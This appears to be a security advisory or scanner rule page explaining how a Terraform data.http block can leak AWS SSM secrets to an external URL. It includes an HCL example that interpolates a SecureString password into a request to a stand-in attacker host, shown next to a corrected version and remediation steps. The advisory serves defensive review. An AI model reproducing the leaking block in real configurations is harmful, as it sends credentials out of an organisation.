HTTP data block can be used to leak secrets or variables outside of the organization
Severity | Exploitability | Providers | Categories |
---|---|---|---|
CRITICAL | HIGH | AWS | SECRET |
Description
The data.http block can be used to exfiltrate any value from the configuration to an arbitrary external URL: Terraform issues the HTTP request itself during plan or apply, so whatever is interpolated into the url (or the request headers) of the data source is sent to that host.
In particular, secret values stored through the aws_ssm_parameter resource (for example a SecureString parameter) can be leaked by interpolating them into the URL of the data.http query.
This is a critical vulnerability when secure credentials are leaked in this way.
Once the block is in place and the URL is controlled by the attacker, no privileges are required to exploit it: every plan or apply re-sends the value, so the leak continues until the configuration is remediated.
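The following configuration is an added illustration of the pattern described above, not code from the original page: a generated database password is stored in SSM Parameter Store and then leaked through the url of a data.http block, followed by a corrected form. The parameter name, the hosts example.attacker.test and releases.example.com, and the resource names are assumptions made for the example.

```hcl
# Added example, not from the original page. Names and hosts are assumptions.

# A generated secret stored as a SecureString in SSM Parameter Store.
resource "random_password" "db" {
  length  = 32
  special = true
}

resource "aws_ssm_parameter" "db_password" {
  name  = "/prod/db/password" # assumed parameter name
  type  = "SecureString"
  value = random_password.db.result
}

# VULNERABLE: the parameter value is interpolated into the request URL.
# Terraform performs this GET during plan/apply, so the secret is sent to
# whoever controls the host and lands in that host's access logs. Because
# aws_ssm_parameter.value is marked sensitive, the plan output shows the url
# as "(sensitive value)", which hides the leak rather than surfacing it.
# Values placed in request_headers would leak in exactly the same way.
data "http" "leak" {
  url = "https://example.attacker.test/collect?v=${aws_ssm_parameter.db_password.value}"
}

# CORRECTED: no secret-bearing data.http block at all. If an HTTP lookup is
# genuinely needed, point it at a host you trust, keep sensitive values out
# of url and request_headers, and fail the run on an unexpected response.
data "http" "release_metadata" {
  url = "https://releases.example.com/latest.json" # assumed, non-secret endpoint

  lifecycle {
    postcondition {
      condition     = self.status_code == 200
      error_message = "Unexpected status code from release metadata endpoint."
    }
  }
}
```

When reviewing a configuration or a third-party module for this pattern, inspect every data "http" block and trace each reference in its url and request_headers back to its origin; a reference to an aws_ssm_parameter value, a random_password result, or any other sensitive attribute is the finding. Do not rely on plan output to catch it, since sensitive interpolations are redacted there while the request is still sent.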
Impact
Potential data exposure | Visible in logs | User interaction required | Privileges required |
---|---|---|---|
True | True | False | False |
Once credentials have been exposed, an attacker can gain persistent access to the resources they protect, and from there to the rest of the organization.
Remediation guidelines
- Revoke and rotate all potentially exposed credentials.
- Remove the data.http block if possible; if an HTTP lookup is genuinely required, make sure no sensitive value is referenced in its URL or request headers.
- Determine when the block was introduced, since every plan or apply since then has re-sent the value.
- If this configuration comes from a third-party module, immediately replace it with a "Verified" alternative.